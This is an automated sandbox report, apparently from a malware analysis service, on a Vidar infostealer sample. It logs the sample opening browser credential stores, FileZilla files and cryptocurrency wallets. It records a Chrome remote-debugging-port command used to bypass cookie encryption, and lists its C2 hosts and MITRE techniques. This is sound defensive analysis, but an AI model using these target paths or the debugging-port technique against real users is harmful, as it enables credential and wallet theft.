                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\security_state\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6364, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6364, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		14
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Create Account                		1
                Extra Window Memory Injection                		11
                Obfuscated Files or Information                		1
                Credentials in Registry                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		411
                Process Injection                		1
                Software Packing                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Registry Run Keys / Startup Folder                		1
                Timestomp                		NTDS34
                System Information Discovery                		Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Query Registry                		SSHKeylogging115
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Extra Window Memory Injection                		Cached Domain Credentials11
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync31
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                Process Injection                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1603227 Sample: SoftWareGX.exe Startdate: 30/01/2025 Architecture: WINDOWS Score: 100 84 huloar.live 2->84 86 www.dropbox.com 2->86 88 3 other IPs or domains 2->88 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 12 other signatures 2->120 9 SoftWareGX.exe 15 16 2->9         started        14 msedge.exe 2->14         started        signatures3 process4 dnsIp5 100 147.45.44.42, 49706, 80 FREE-NET-ASFREEnetEU Russian Federation 9->100 64 C:\Users\user\AppData\Local\...\yomkssf4.0.cs, Unicode 9->64 dropped 66 C:\Users\user\AppData\...\m3uz1vzd.cmdline, Unicode 9->66 dropped 68 C:\Users\user\AppData\Local\...\m3uz1vzd.0.cs, Unicode 9->68 dropped 124 Writes to foreign memory regions 9->124 126 Allocates memory in foreign processes 9->126 128 Compiles code to access protected / encrypted code 9->128 130 2 other signatures 9->130 16 MSBuild.exe 1 34 9->16         started        20 MSBuild.exe 9->20         started        22 csc.exe 3 9->22         started        33 2 other processes 9->33 70 C:\Users\user\AppData\Local\...\History, SQLite 14->70 dropped 25 msedge.exe 14->25         started        27 msedge.exe 14->27         started        29 msedge.exe 14->29         started        31 msedge.exe 14->31         started        file6 signatures7 process8 dnsIp9 72 huloar.live 116.202.5.153, 443, 49708, 49709 HETZNER-ASDE Germany 16->72 74 t.me 149.154.167.99, 443, 49707 TELEGRAMRU United Kingdom 16->74 80 2 other IPs or domains 16->80 102 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->102 104 Found many strings related to Crypto-Wallets (likely being stolen) 16->104 106 Tries to harvest and steal ftp login credentials 16->106 112 3 other signatures 16->112 35 msedge.exe 2 9 16->35         started        38 chrome.exe 8 16->38         started        41 cmd.exe 16->41         started        108 Attempt to bypass Chrome Application-Bound Encryption 20->108 110 Creates HTML files with .exe extension (expired dropper behavior) 20->110 60 C:\Users\user\AppData\Local\...\yomkssf4.dll, PE32 22->60 dropped 43 conhost.exe 22->43         started        45 cvtres.exe 1 22->45         started        76 23.51.89.40, 443, 50200 VODAFONE-AS-APVodafoneAustraliaPtyLtdAU United States 25->76 78 23.51.56.9, 443, 50248 TMNET-AS-APTMNetInternetServiceProviderMY United States 25->78 82 51 other IPs or domains 25->82 62 C:\Users\user\AppData\Local\...\m3uz1vzd.dll, PE32 33->62 dropped 47 conhost.exe 33->47         started        49 cvtres.exe 1 33->49         started        file10 signatures11 process12 dnsIp13 122 Monitors registry run keys for changes 35->122 51 msedge.exe 35->51         started        96 192.168.2.16, 138, 443, 49706 unknown unknown 38->96 98 239.255.255.250 unknown Reserved 38->98 53 chrome.exe 38->53         started        56 conhost.exe 41->56         started        58 timeout.exe 41->58         started        signatures14 process15 dnsIp16 90 plus.l.google.com 172.217.16.142, 443, 49728 GOOGLEUS United States 53->90 92 play.google.com 172.217.23.110, 443, 49733 GOOGLEUS United States 53->92 94 2 other IPs or domains 53->94

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.